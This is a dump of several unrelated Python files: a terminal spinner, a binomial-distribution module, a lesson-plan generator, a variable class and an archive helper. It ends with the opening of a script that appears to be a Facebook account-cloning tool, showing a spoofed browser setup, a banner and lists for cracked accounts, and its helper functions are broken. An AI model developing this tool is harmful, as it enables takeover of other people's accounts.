        self._spin_cycle = itertools.cycle(spin_chars)
        self._file.write(" " * get_indentation() + self._message + " ... ")
        # Width of the last status written, so _write knows how much to erase.
        self._width = 0
    def _write(self, status):
        assert not self._finished
        # Erase what we wrote before by backspacing to the beginning, writing
        # spaces to overwrite the old text, and then backspacing again
        backup = "\b" * self._width
        self._file.write(backup + " " * self._width + backup)
        # Now we have a blank slate to add our status
        self._file.write(status)
        self._width = len(status)
        self._file.flush()
        self._rate_limiter.reset()
    def spin(self):
        # Advance the animation; a no-op once finished or when called again
        # within the rate limit.
        if self._finished:
            return
        if not self._rate_limiter.ready():
            return
        self._write(next(self._spin_cycle))
    def finish(self, final_status):
        # Replace the spinner frame with the final status and end the line.
        if self._finished:
            return
        self._write(final_status)
        self._file.write("\n")
        self._file.flush()
        self._finished = True
# Used for dumb terminals, non-interactive installs (no tty), etc.
# We still print updates occasionally (once every 60 seconds by default) to
# act as a keep-alive for systems like Travis-CI that take lack-of-output as
# an indication that a task has frozen.
class NonInteractiveSpinner(object):
    """Spinner replacement for dumb terminals and non-tty output.

    Instead of animating, it emits a log line at most once per interval so
    CI systems (e.g. Travis) that treat silence as a hang still see output.
    """
    def __init__(self, message, min_update_interval_seconds=60):
        self._message = message
        self._finished = False
        self._rate_limiter = RateLimiter(min_update_interval_seconds)
        self._update("started")

    def _update(self, status):
        # Log "<message>: <status>" and restart the rate-limit window.
        assert not self._finished
        self._rate_limiter.reset()
        logger.info("%s: %s", self._message, status)

    def spin(self):
        # Emit a keep-alive line, at most once per interval, until finished.
        if self._finished or not self._rate_limiter.ready():
            return
        self._update("still running...")

    def finish(self, final_status):
        if not self._finished:
            self._update("finished with status '%s'" % (final_status,))
            self._finished = True
@contextlib.contextmanager
def open_spinner(message):
    """Yield a spinner suited to the current terminal and finish it with
    "done", "canceled" (KeyboardInterrupt) or "error" depending on how the
    body exits; exceptions are re-raised after the status is written."""
    # Interactive spinner goes directly to sys.stdout rather than being routed
    # through the logging system, but it acts like it has level INFO,
    # i.e. it's only displayed if we're at level INFO or better.
    # Non-interactive spinner goes through the logging system, so it is always
    # in sync with logging configuration.
    if sys.stdout.isatty() and logger.getEffectiveLevel() <= logging.INFO:
        spinner = InteractiveSpinner(message)
    else:
        spinner = NonInteractiveSpinner(message)
    try:
        with hidden_cursor(sys.stdout):
            yield spinner
    except KeyboardInterrupt:
        spinner.finish("canceled")
        raise
    except Exception:
        spinner.finish("error")
        raise
    else:
        spinner.finish("done")
| [
"patilmanojk@gmail.com"
] | patilmanojk@gmail.com |
4a2edd27b685ec913189effd9e6de50548c275d2 | 22cb2dcd5aff07d03217f03344817148532546de | /MultiplicativeBinomial.py | 17262dfb344cea78092f87e578f31681a6a88e04 | [] | no_license | thomasjdelaney/Multiplicative_Binomial_Distribution | 5789609e05392fcb5363d4e816206334b9caf5b2 | 080f8acdda4ad4aee6b85a518a44ef12beb391ba | refs/heads/master | 2022-04-22T07:26:59.184713 | 2020-04-17T16:32:31 | 2020-04-17T16:32:31 | 256,489,329 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,736 | py | """
For the class of MultiplicativeBinomial distribution object and all useful functions relating to it.
"""
import numpy as np
from scipy.special import comb
from scipy.optimize import minimize
class MultiplicativeBinomial(object):
def __init__(self, p, theta, m):
"""
Creates the Conway-Maxwell binomial distribution with parameters p, nu, and m. Calculates the normalising function during initialisation. Uses exponents and logs to avoid overflow.
Arguments: self,
p, real 0 <= p <= 1, probability of success
theta, real, dispersion parameter
m, number of trials
Returns: object
"""
self.p = p
self.theta = theta
self.m = m
self.normaliser = self.getNormaliser()
self.has_samp_des_dict = False
self.samp_des_dict, self.has_samp_des_dict = self.getSamplingDesignDict()
def pmf_atomic(self, k):
"""
Probability mass function. Uses exponents and logs to avoid overflow.
Arguments: self, ConwayMaxwellBinomial object,
k, int, must be an integer in the interval [0, m]
Returns: P(k)
"""
if (k > self.m) | (k != int(k)) | (k < 0):
raise ValueError("k must be an integer between 0 and m, inclusive")
if self.p == 1:
p_k = 1 if k == self.m else 0
elif self.p == 0:
p_k = 1 if k == 0 else 0
elif self.has_samp_des_dict:
p_k = self.samp_des_dict.get(k)
else:
p_k = self.getProbMassForCount(k)/self.normaliser
return p_k
def pmf(self, k):
"""
Probability mass function that can take lists or atomics.
Arguments: self, ConwayMaxwellBinomial object,
k, int, or list of ints
Returns: P(k)
"""
if np.isscalar(k):
return self.pmf_atomic(k)
else:
return np.array([self.pmf_atomic(k_i) for k_i in k])
def logpmf(self, k):
"""
Log probability mass function. Does what it says on the tin.
Improvement might be possible, later.
Arguments: self, ConwayMaxwellBinomial object,
k, int, must be an integer in the interval [0,m]
Returns: log P(k)
"""
return np.log(self.pmf(k))
def cdf_atomic(self, k):
"""
For getting the cumulative distribution function of the distribution at k.
Arguments: self, the distribution object
k, int, must be an integer in the interval [0,m]
Returns: float
NB: this function relies on the sampling design dictionary keys being sorted!
"""
accumulated_density = 0
if (k > self.m) | (k != int(k)) | (k < 0):
raise ValueError("k must be an integer between 0 and m, inclusive")
elif k == 0:
return self.samp_des_dict[0]
elif k == self.m:
return 1.0
else:
for dk,dv in self.samp_des_dict.items():
if dk <= k:
accumulated_density += dv
else:
return accumulated_density # avoids looping through all the keys unnecessarily.
def cdf(self, k):
"""
For getting the cumulative distribution function at k, or a list of k.
Arguments: self, the distribution object
k, int, must be an integer in the interval [0,m]
Returns: float or array of floats
"""
if np.isscalar(k):
return self.cdf_atomic(k)
else:
return np.array([self.cdf_atomic(k_i) for k_i in k])
def getSamplingDesignDict(self):
"""
Returns a dictionary representing the sampling design of the distribution. That is, samp_des_dict[k] = pmf(k)
Arguments: self, the distribution object,
Returns: samp_des_dict, dictionary, int => float
has_samp_des_dict, True
"""
possible_values = range(0,self.m+1)
samp_des_dict = dict(zip(possible_values, self.pmf(possible_values)))
has_samp_des_dict = True
return samp_des_dict, has_samp_des_dict
def rvs(self, size=1):
return np.random.choice(range(0,self.m + 1), size=size, replace=True, p=list(self.samp_des_dict.values()))
def getNormaliser(self):
"""
For calculating the normalising factor of the distribution.
Arguments: self, the distribution object
Returns: the value of the normalising factor S(p,nu)
"""
if (self.p == 0) | (self.p == 1):
warnings.warn("p = " + str(self.p) + " The distribution is deterministic.")
return 0
else:
return np.sum([self.getProbMassForCount(k) for k in range(0, self.m + 1)])
def getProbMassForCount(self, k):
"""
For calculating the unnormalised probability mass for an individual count.
Arguments: self, the distribution object
k, int, must be an integer in the interval [0, m]
Returns: float,
"""
return np.exp(np.log(comb(self.m, k)) + (k * np.log(self.p)) + ((self.m - k) * np.log(1-self.p)) + (k * (self.m - k) * np.log(self.theta)))
def multiplicativeBinomialNegLogLike(params, m, samples):
"""
For calculating the negative log likelihood at p,theta.
Arguments: params: p, 0 <= p <= 1
theta, float, dispersion parameter
m, number of bernoulli variables
samples, ints between 0 and m, data.
Returns: float, negative log likelihood
"""
p, theta = params
if (p == 1) | (p == 0):
return np.infty
n = samples.size
multi_bin_dist = MultiplicativeBinomial(p, theta, m)
p_part = np.log(p/(1-p))*samples.sum()
theta_part = np.log(theta) * np.sum((samples*(m-samples)))
partition_part = np.log(multi_bin_dist.normaliser) - (m * np.log(1-p))
return n*partition_part - p_part - theta_part - np.log(comb(m,samples)).sum()
def estimateParams(m, samples, init):
    """
    For estimating the parameters of the Conway-Maxwell binomial distribution
    from the given samples by minimising the negative log likelihood.
    Arguments: m, the number of bernoulli variables being used.
               samples, ints, between 0 and m
               init, initial guess for the parameters, p and theta
    Return: the fitted params, p and theta
    """
    eps = np.finfo(float).resolution
    p_bounds = (eps, 1 - eps)      # keep p strictly inside (0, 1)
    theta_bounds = (eps, None)     # theta must remain positive
    fit = minimize(multiplicativeBinomialNegLogLike, init,
                   args=(m, samples), bounds=(p_bounds, theta_bounds))
    return fit.x
| [
"thomas.delaney@posteo.net"
] | thomas.delaney@posteo.net |
8d87c9e0c2d652d34e9fa4039380342998515f3e | fb63e8ddaead99538d7b46467166904cd8b34580 | /weeklylpall-20160101.py | 3f82de2d98e1cabffaac9a32cb9d71436f500a69 | [
"BSD-3-Clause"
] | permissive | mwbetrg/skripbatak | da5410a3be83393957d32ad53991466244757185 | 4565e26cf9e3c40c0b38374d8dd07ae7313f5899 | refs/heads/master | 2021-01-19T01:39:25.516181 | 2017-01-18T23:12:29 | 2017-01-18T23:12:29 | 42,288,141 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,291 | py | #qpy:console
import site
import os
from peewee import *
import time
import datetime
import io
import sys
# 20160103
# Pick the database file: prefer the external SD card copy (Android/QPython
# layout) and fall back to a local file in the working directory.
if os.path.exists('/storage/extSdCard'):
    db = SqliteDatabase('/storage/extSdCard/mydb/lessonplan2010.db', **{})
    #backupdir = '/storage/extSdCard/dbbackup/'
    #db = '/storage/extSdCard/mydb/english-notes-exercises.sqlite'
else:
    db = SqliteDatabase('lessonplan2010.db', **{})
    #db = SqliteDatabase('lessonplan2010.db', **{})
    #db = SqliteDatabase('/storage/extSdCard/englishdb/lessonplan2010.db', **{})
class BaseModel(Model):
    # Common base: binds every concrete model below to the SQLite database
    # selected above (external SD card path when present).
    class Meta:
        database = db
class Lessonplan2016(BaseModel):
    """One lesson-plan entry for 2016 (one class period on one date);
    maps onto the existing table 'lessonplan2016'."""
    activity1 = CharField(null=True)
    activity2 = CharField(null=True)
    assimilation = CharField(null=True)
    content = CharField(null=True)
    # Lesson date stored as a YYYYMMDD number (built via strftime('%Y%m%d')).
    date = IntegerField(null=True)
    duration = CharField(null=True)   # length in minutes, kept as a string
    exercise = TextField(null=True)
    handout = TextField(null=True)
    impact = CharField(null=True)
    lo1 = CharField(null=True)  # lo1..lo3: presumably learning objectives -- TODO confirm
    lo2 = CharField(null=True)
    lo3 = CharField(null=True)
    note = CharField(null=True)
    theme = CharField(null=True)
    timeend = CharField(null=True)    # 24h 'HHMM' string, e.g. '1020'
    timestart = CharField(null=True)  # 24h 'HHMM' string, e.g. '0820'
    tingkatan = CharField(null=True)  # form/class name, e.g. '6AI3'
    topic = CharField(null=True)
    week = CharField(null=True)       # school week number (from argv)
    class Meta:
        db_table = 'lessonplan2016'
class Lessonplanbank(BaseModel):
    """Reusable lesson-plan template ('bank' entry), keyed by bank_id;
    maps onto the existing table 'lessonplanbank'."""
    activity1 = CharField(null=True)
    activity2 = CharField(null=True)
    assimilation = CharField(null=True)
    # Primary key stored in the 'bank_id' column.
    bank = PrimaryKeyField(db_column='bank_id', null=True)
    content = CharField(null=True)
    duration = CharField(null=True)
    exercise = TextField(null=True)
    handout = TextField(null=True)
    impact = CharField(null=True)
    level = CharField(null=True)
    lo1 = CharField(null=True)  # lo1..lo3: presumably learning objectives -- TODO confirm
    lo2 = CharField(null=True)
    lo3 = CharField(null=True)
    note = CharField(null=True)
    theme = CharField(null=True)
    tingkatan = CharField(null=True)  # form/class name
    topic = CharField(null=True)
    week = IntegerField(null=True)
    class Meta:
        db_table = 'lessonplanbank'
db.connect()
# Three CLI arguments are required: week number, month, and the day of month
# of the Sunday that starts the school week.
if len(sys.argv) < 4:
    print "Begini boh: %s minggu (WW) bulan (MM) hb (DD)" % sys.argv[0]
    sys.exit(1)
week = sys.argv[1]     # school week number, stored on every record
month = sys.argv[2]    # month of the week's Sunday
hb = int(sys.argv[3])  # day of month of the week's Sunday
tahunini = datetime.datetime.now().year  # current year
#tahunini = "2015"
# The given date is the Sunday; Monday..Thursday are offsets of 1..4 days.
tdatesun = datetime.datetime(int(tahunini), int(month), int(hb)) + datetime.timedelta(days=0)
datesun = tdatesun.strftime('%Y%m%d')
#datesun = (str(tahunini)+str(month)+str(hb))
#-----------------------------------------------------------------------
tdatemon = datetime.datetime(int(tahunini), int(month), int(hb)) + datetime.timedelta(days=1)
tdatetue = datetime.datetime(int(tahunini), int(month), int(hb)) + datetime.timedelta(days=2)
tdatewed = datetime.datetime(int(tahunini), int(month), int(hb)) + datetime.timedelta(days=3)
tdatethu = datetime.datetime(int(tahunini), int(month), int(hb)) + datetime.timedelta(days=4)
# YYYYMMDD strings used as the `date` field on the lesson-plan records.
datemon = tdatemon.strftime('%Y%m%d')
datetue = tdatetue.strftime('%Y%m%d')
datewed = tdatewed.strftime('%Y%m%d')
datethu = tdatethu.strftime('%Y%m%d')
#-----------------------------------------------------------------------
# Sunday
sun01 = Lessonplan2016.create(tingkatan="6AI3",\
date=int(datesun),\
timestart="0820",\
timeend="1020",\
duration="120",\
theme="-",\
topic="-",\
lo1="-",\
lo2="-",\
lo3="-",\
content="-",\
activity1="-",\
activity2="-",\
activity3="-",\
assimilation="-",\
impact="-",\
note="-",\
week=week,\
handout="-",\
exercise="-"
)
sun02 = Lessonplan2016.create(tingkatan="6AI5",\
date=datesun,\
timestart="1050",\
timeend="1250",\
duration="120",\
theme="-",\
topic="-",\
lo1="-",\
lo2="-",\
lo3="-",\
content="-",\
activity1="-",\
activity2="-",\
activity3="-",\
assimilation="-",\
impact="-",\
note="-",\
week=week,\
handout="-",\
exercise="-"
)
#-----------------------------------------------------------------------
# Monday
mon01 = Lessonplan2016.create(tingkatan="6AI3",\
date=datemon,\
timestart="0900",\
timeend="1100",\
duration="120",\
theme="-",\
topic="-",\
lo1="-",\
lo2="-",\
lo3="-",\
content="-",\
activity1="-",\
activity2="-",\
activity3="-",\
assimilation="-",\
impact="-",\
note="-",\
week=week,\
handout="-",\
exercise="-"
)
mon02 = Lessonplan2016.create(tingkatan="6BI4",\
date=datemon,\
timestart="1130",\
timeend="1330",\
duration="120",\
theme="-",\
topic="-",\
lo1="-",\
lo2="-",\
lo3="-",\
content="-",\
activity1="-",\
activity2="-",\
activity3="-",\
assimilation="-",\
impact="-",\
note="-",\
week=week,\
handout="-",\
exercise="-"
)
#-----------------------------------------------------------------------
# Tuesday
tue01 = Lessonplan2016.create(tingkatan="6AI5",\
date=datetue,\
timestart="0820",\
timeend="1020",\
duration="120",\
theme="-",\
topic="-",\
lo1="-",\
lo2="-",\
lo3="-",\
content="-",\
activity1="-",\
activity2="-",\
activity3="-",\
assimilation="-",\
impact="-",\
note="-",\
week=week,\
handout="-",\
exercise="-"
)
tue02 = Lessonplan2016.create(tingkatan="6AI3",\
date=datetue,\
timestart="1250",\
timeend="1410",\
duration="80",\
theme="-",\
topic="-",\
lo1="-",\
lo2="-",\
lo3="-",\
content="-",\
activity1="-",\
activity2="-",\
activity3="-",\
assimilation="-",\
impact="-",\
note="-",\
week=week,\
handout="-",\
exercise="-"
)
#-----------------------------------------------------------------------
# Wednesday
wed01 = Lessonplan2016.create(tingkatan="6AI5",\
date=datewed,\
timestart="0740",\
timeend="0900",\
duration="80",\
theme="-",\
topic="-",\
lo1="-",\
lo2="-",\
lo3="-",\
content="-",\
activity1="-",\
activity2="-",\
activity3="-",\
assimilation="-",\
impact="-",\
note="-",\
week=week,\
handout="-",\
exercise="-"
)
wed02 = Lessonplan2016.create(tingkatan="6BI4",\
date=datewed,\
timestart="0940",\
timeend="1100",\
duration="80",\
theme="-",\
topic="-",\
lo1="-",\
lo2="-",\
lo3="-",\
content="-",\
activity1="-",\
activity2="-",\
activity3="-",\
assimilation="-",\
impact="-",\
note="-",\
week=week,\
handout="-",\
exercise="-"
)
#-----------------------------------------------------------------------
# Thursday
thu01 = Lessonplan2016.create(tingkatan="6BI4",\
date=datethu,\
timestart="1210",\
timeend="1410",\
duration="120",\
theme="-",\
topic="-",\
lo1="-",\
lo2="-",\
lo3="-",\
content="-",\
activity1="-",\
activity2="-",\
activity3="-",\
assimilation="-",\
impact="-",\
note="-",\
week=week,\
handout="-",\
exercise="-"
)
thisweek = Lessonplan2016.select().where(Lessonplan2016.week == week)
for i in thisweek:
print str(i.date)+" = "+i.timestart
| [
"mwbetrg@gmail.com"
] | mwbetrg@gmail.com |
785561d341540c7549325e56f64e3838bd93b98b | 9f3b43a01f205fb1692cd4e873a5fa4fd2b4d78e | /variable.py | eb6eceee564e253696b79b225e05aa3df7a686a8 | [] | no_license | sourlemon11/curve_synthesis | f88f1eb8da5ff7de79c7da377d3e85265b1f99dd | edc088bd9a3493f08ea6a5aeb2fc88f51231afe7 | refs/heads/master | 2020-04-09T10:22:05.822389 | 2018-12-03T23:46:35 | 2018-12-03T23:46:35 | 160,269,107 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,668 | py | import logging
# import ipdb
from numpy import linspace as np_linspace, round as np_round, array as np_array
from sympy import symbols as sp_symbols
# from collections import ChainMap
# Variable
# --> Contains
# --> ... Range, n_points, linspace
# goes into curve as an class
class Variable():
    """
    A single curve variable.

    Wraps a (sympy) symbol together with either a numeric range (``ran``,
    sampled over ``n`` points via the ``linspace`` property) or a fixed
    value (``val``).  ``is_constant`` marks the variable that is to be held
    constant when several variables are combined (see ``Variables``).
    """

    def __init__(self, symbol, ran=None, val=None, is_const=False, n=None):
        logging.debug(f"Running class Variable for {symbol}, range:{ran}, val:{val}, constant:{is_const}")
        self._name = str(symbol)
        self._symbol = symbol
        # Normalise the range endpoints to a tuple of floats (None if absent).
        self._ran = None if ran is None else tuple(float(x) for x in ran)
        logging.debug(f"init range: {self._ran}")
        self._val = None if val is None else float(val)
        self._n = n
        self._linspace = None
        self._is_constant = is_const

    @property
    def symbol(self):
        return self._symbol

    @symbol.setter
    def symbol(self, s):
        self._symbol = s

    @property
    def name(self):
        return self._name

    @name.setter
    def name(self, name):
        self._name = name

    @property
    def ran(self):
        return self._ran

    @ran.setter
    def ran(self, r: tuple):
        if len(r) == 2:
            # BUG FIX: the original assigned the bare generator expression
            # (float(x) for x in r), so `ran` became a single-use generator
            # instead of a tuple, breaking the `type(self.ran) is tuple`
            # check in `linspace`.  Materialise to a tuple, as in __init__.
            self._ran = tuple(float(x) for x in r)
        else:
            self._ran = None

    @property
    def val(self):
        return self._val

    @val.setter
    def val(self, v):
        self._val = v

    @property
    def n(self):
        # Number of sample points used by `linspace`.
        return self._n

    @n.setter
    def n(self, n):
        if (type(n) is int):
            self._n = n
        else:
            raise TypeError("Use an int")

    @property
    def is_constant(self):
        return self._is_constant

    @is_constant.setter
    def is_constant(self, is_const):
        self._is_constant = is_const

    @property
    def linspace(self):
        # When a range is set, sample it over n points (rounded to 3 d.p.);
        # otherwise wrap the fixed value in a 0-d numpy array.
        if type(self.ran) is tuple:
            try:
                logging.debug(f"using ran: {self.ran}, type {type(self.ran[0])} for linspace")
                self._linspace = np_round(
                    np_linspace(self.ran[0],
                                self.ran[-1],
                                self.n), decimals=3)
                logging.debug(f"running linspace for {self.name}, if linspace: {type(self._linspace)}")
            except Exception:
                # Narrowed from a bare `except` so KeyboardInterrupt and
                # SystemExit are not swallowed.
                raise(ValueError("Could not assign linspace"))
            return self._linspace
        else:
            self._linspace = np_array(self.val)
            return self._linspace

    @linspace.setter
    def linspace(self, ls: list):
        self._linspace = ls
class Variables():
    """
    An ordered collection of Variable objects, keyed by their names.

    Builds a name -> Variable dict, supports iteration over the variables,
    and records which variable (if any) is marked constant.

    Args:
        Vars: iterable of Variable objects (each must expose .name and
              .is_constant).
    """
    def __init__(self, Vars):
        # Reimplement ChainMap-style init (original experiment left below).
        #self.maps = list(maps) or [{}] # always at least one map
        key_names = [v.name for v in Vars]
        self._Vars = dict(zip(key_names, Vars))
        # Cursor for the iterator protocol (shared across __iter__/__next__).
        self.index = 0
        self._constant_var = None
        self._any_constant = False
        self._check_any_constant()
    # def __getattr__(self, name):
    #     """Override to get a variable name based on attribute from the dict Vars"""
    #     attr = self.Vars[name]
    #     return attr
    @property
    def Vars(self):
        # Mapping of variable name -> Variable.
        return self._Vars
    @property
    def constant_var(self):
        # The Variable flagged is_constant, or None when there is none.
        return self._constant_var
    @constant_var.setter
    def constant_var(self, v):
        self._constant_var = v
    @property
    def any_constant(self):
        # True once a constant variable has been registered.
        return self._any_constant
    @any_constant.setter
    def any_constant(self, d):
        self._any_constant = d
    def __iter__(self):
        # Restart iteration from the first variable.
        self.index = 0
        return self
    def __next__(self):
        # NOTE: rebuilds list(self.Vars.values()) on every step (O(n) each).
        if(self.index == len(self.Vars)):
            raise StopIteration
        else:
            V = list(self.Vars.values())[self.index]
            self.index += 1
            return V
    def _check_any_constant(self):
        # Scan all variables for ones flagged is_constant, recording the
        # match in self.constant_var and returning True if any was found.
        runs = 0
        def check_constant(m):
            nonlocal runs
            runs+=1
            if m.is_constant is True:
                # NOTE(review): self.any_constant is only set to True after
                # check_all returns, so during a single __init__ this
                # RuntimeError never fires even with two constant variables
                # (the last one found silently wins) -- confirm whether
                # duplicates were meant to raise here.
                if self.any_constant is True:
                    raise RuntimeError("Can only have one constant variable!")
                else:
                    logging.debug(f"check_any_constant: constant var is {m.name}")
                    self.constant_var = m
                    return True
        def check_all(maps):
            # The list comprehension evaluates check_constant for EVERY
            # variable (no short-circuit), then any() inspects the results.
            if(any([check_constant(m) for m in maps])):
                return True
        if(type(self.Vars) is dict):
            if check_all(list(self.Vars.values())):
                self.any_constant = True
                return True
            else: return False
| [
"soneen11@yahoo.com"
] | soneen11@yahoo.com |
566bdadc52d20472b63a9220e98e6d64c70af204 | 12fb02e7d946002beee4e095ea23f4d98c968afa | /tscripts/yunwei/operate/compress.py | 2322013f32616938001a146dfb17314ba7e2ad9c | [] | no_license | cash2one/yunwei-1 | 0ab4ec0783c061739dc9a6c3db2f9379605746fd | b929fe23fd95ea1f18bd809b82523101eb414309 | refs/heads/master | 2020-07-02T14:31:00.776030 | 2016-09-09T05:31:52 | 2016-09-09T05:31:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,511 | py | #!/usr/bin/env python
#-*- coding:utf-8 -*-
'''
date: 2016/08/20
role: 压缩解压
usage: cmb = compressBase(log_path) 实例化
cmb.zipp(source_dir,zipfile_path)
cmb.tar(source_dir,tarfile_path)
cmb.unzip(zipfile_path,target_dir)
cmb.untar(tarfile_path,target_dir)
'''
from __future__ import absolute_import
from yunwei.operate.prefix import log
logIns = log('117')
import os,zipfile,tarfile
###压缩解压操作类
class compressBase:
    """Compression/extraction helper (Python 2): creates and unpacks zip and
    tar.gz archives, logging failures via the yunwei log helper (code 117)."""
    def __init__(self,log_path):
        # log_path: file the log output should be written to.
        # NOTE(review): this assigns to a *local* name `logIns`; the
        # module-level `logIns = log('117')` created at import time is NOT
        # rebound, so the methods below still log with the default path --
        # confirm whether `global logIns` was intended.
        logIns = log('117',log_path)
        self.zf = ''
    # Destructor: close any archive handle still open.
    def __del__(self):
        try:
            self.zf.close()
        except:
            pass
    # Create a zip archive from a file or directory tree.
    def zipp(self,source_dir,zipfile_path):
        # Abort (log + raise) when the source path does not exist.
        if not os.path.exists(source_dir):
            logIns.writeLog('error','%s not exists' %source_dir)
            raise ValueError('117,%s not exists' %source_dir)
        # Collect every file under source_dir (or the single file itself).
        file_list = []
        if os.path.isfile(source_dir):
            file_list.append(source_dir)
        else:
            for root, dirs, files in os.walk(source_dir):
                for name in files:
                    file_list.append(os.path.join(root, name))
        # Write the archive; arcnames are paths relative to source_dir.
        # NOTE(review): zipfile.zlib.DEFLATED happens to equal
        # zipfile.ZIP_DEFLATED (8), but the documented constant is
        # zipfile.ZIP_DEFLATED -- consider switching.
        self.zf = zipfile.ZipFile(zipfile_path, "w", zipfile.zlib.DEFLATED)
        for file_one in file_list:
            arc_name = file_one[len(source_dir):]
            self.zf.write(file_one,arc_name)
    # Extract a zip archive into unzip_dir (created if missing).
    def unzip(self,zipfile_path, unzip_dir):
        if not os.path.exists(unzip_dir):
            os.makedirs(unzip_dir, 0777)
        self.zf = zipfile.ZipFile(zipfile_path)
        for name in self.zf.namelist():
            # Normalise Windows-style separators inside the archive.
            name = name.replace('\\','/')
            if name.endswith('/'):
                os.makedirs(os.path.join(unzip_dir, name))
            else:
                ext_file = os.path.join(unzip_dir, name)
                ext_dir = os.path.dirname(ext_file)
                if not os.path.exists(ext_dir) :
                    os.makedirs(ext_dir,0777)
                with open(ext_file, 'wb') as ef:
                    ef.write(self.zf.read(name))
    # Create a gzip-compressed tar archive from a directory tree.
    def tar(self,source_dir,tarfile_path):
        # Abort (log + raise) when the source path does not exist.
        if not os.path.exists(source_dir):
            logIns.writeLog('error','%s not exists' %source_dir)
            raise ValueError('117,%s not exists' %source_dir)
        self.zf = tarfile.open(tarfile_path, "w:gz")
        # Length of the source prefix, stripped to build relative arcnames.
        len_source = len(source_dir)
        # Add every file under source_dir.
        for root, dirs, files in os.walk(source_dir):
            for name in files:
                full_path = os.path.join(root,name)
                self.zf.add(full_path,arcname=os.path.join(root[len_source:],name))
    # Extract a gzip-compressed tar archive into untar_dir (created if missing).
    def untar(self,tarfile_path, untar_dir):
        if not os.path.exists(untar_dir):
            os.makedirs(untar_dir, 0777)
        try:
            self.zf = tarfile.open(tarfile_path, "r:gz")
            file_names = self.zf.getnames()
            for file_name in file_names:
                self.zf.extract(file_name, untar_dir)
        except Exception, e:
            logIns.writeLog('error','%s untar error' %tarfile_path)
            # NOTE(review): other raise sites use a single '117,...' string;
            # this one passes two args ('error', message) -- confirm intent.
            raise ValueError('error','%s untar error' %tarfile_path)
| [
"root@localhost.localdomain"
] | root@localhost.localdomain |
d453bb040eec2a67cd33c35cefc09e5e6a3f1346 | 63b54bfcdd36ac1a0046f2ca4c639d18942c2697 | /123.py | 2fdfb6e0a78c83b3d0d6720d11cd61295d9a9036 | [] | no_license | chandioboss/janu | 898e12498ef17cee33c8ba9c760016ccae33d64a | 5c82db8cc618381c4f175f14b4281e7780eff581 | refs/heads/master | 2022-05-24T05:36:13.134166 | 2020-04-19T11:27:59 | 2020-04-19T11:27:59 | 256,958,609 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 35,437 | py | #!/usr/bin/python2
#coding=utf-8
#The Credit For This Code Goes To IBRAHIM CHANDIO
#If You Wanna Take Credits For This Code, Please Look Yourself Again...
#Reserved2020
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print "\x1b[1;91mExit"
os.sys.exit()
def acak(b):
w = 'ahtdzjc'
d = ''
for i in x:
d += '!' + w[random.randint(0, len(w) - 1)] + i
return cetak(d)
def cetak(b):
w = 'ahtdzjc'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.07)
#Dev:ibrahim_chandio
##### LOGO #####
logo = """
\033[1;95m:•◈•⸎ ⸎ ⸎⸎ ⸎⸎ ⸎ ⸎ ⸎ ⸎ ⸎ ⸎ ⸎ ⸎⸎ ⸎ ⸎ ⸎ ⸎ ⸎•◈••◈•
\033[1;95m:•◈•⸎ ⸎ ⸎⸎ ⸎⸎ ⸎ ⸎ ⸎ ⸎ ⸎ ⸎ ⸎ ⸎⸎ ⸎ ⸎ ⸎ ⸎ ⸎•◈••◈•
\033[1;95m:•◈•⸎ ⸎ ⸎⸎ ⸎⸎\033[1;91m IBRAHIM CH 11 \033[1;95m⸎⸎ ⸎ ⸎ ⸎ ⸎ ⸎•◈••◈•
\033[1;95m:•◈•⸎ ⸎ ⸎⸎ ⸎⸎ \033[1;91m✬✬🄵🄰🄲🄴🄱🄾🄾🄺✬✬ \033[1;95m⸎ ⸎⸎ ⸎ ⸎ ⸎ ⸎ ⸎ ⸎•◈••◈•
\033[1;95m:•◈•⸎ ⸎ ⸎⸎ ⸎⸎ ⸎ ⸎ ⸎ ⸎ ⸎ ⸎ ⸎ ⸎⸎ ⸎ ⸎ ⸎ ⸎ ⸎ ⸎ ⸎ •◈••◈•
\033[1;95m:•◈•⸎ ⸎ ⸎⸎ ⸎⸎ ⸎ ⸎ ⸎ ⸎ ⸎ ⸎ ⸎ ⸎⸎ ⸎ ⸎ ⸎ ⸎ ⸎ ⸎ ⸎ •◈••◈•
\033[1;92m•◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•\033[1;93m-Kali.linux-\033[1;92m•◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•
\033[1;91m•◈•▀██▄██▀▀██▄██▀▀██▄██▀▀██▄██▀▀██▄██▀▀██▄██▀▀██▄██▀•◈•
\033[1;91m•◈•▀██▄██▀\033[1;93m•◈•WhatsApp Number +923009232856•\033[1;91m▀██▄██▀▀██•◈•
\033[1;91m•◈•▀██▄██▀\033[1;93m•◈•IBRAHIM CHANDIO ASH Cloning•\033[1;91m▀██▄██▀▀██•◈•
\033[1;91m•◈•▀██▄██▀▀██▄██▀▀██▄██▀▀██▄██▀▀██▄██▀▀██▄██▀▀██▄██▀•◈•
\033[1;92m•◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•\033[1;93mKali.linux\033[1;92m•◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•"""
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\x1b[1;93mPlease Wait \x1b[1;93m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
berhasil = []
cekpoint = []
oks = []
id = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
os.system("clear")
print """
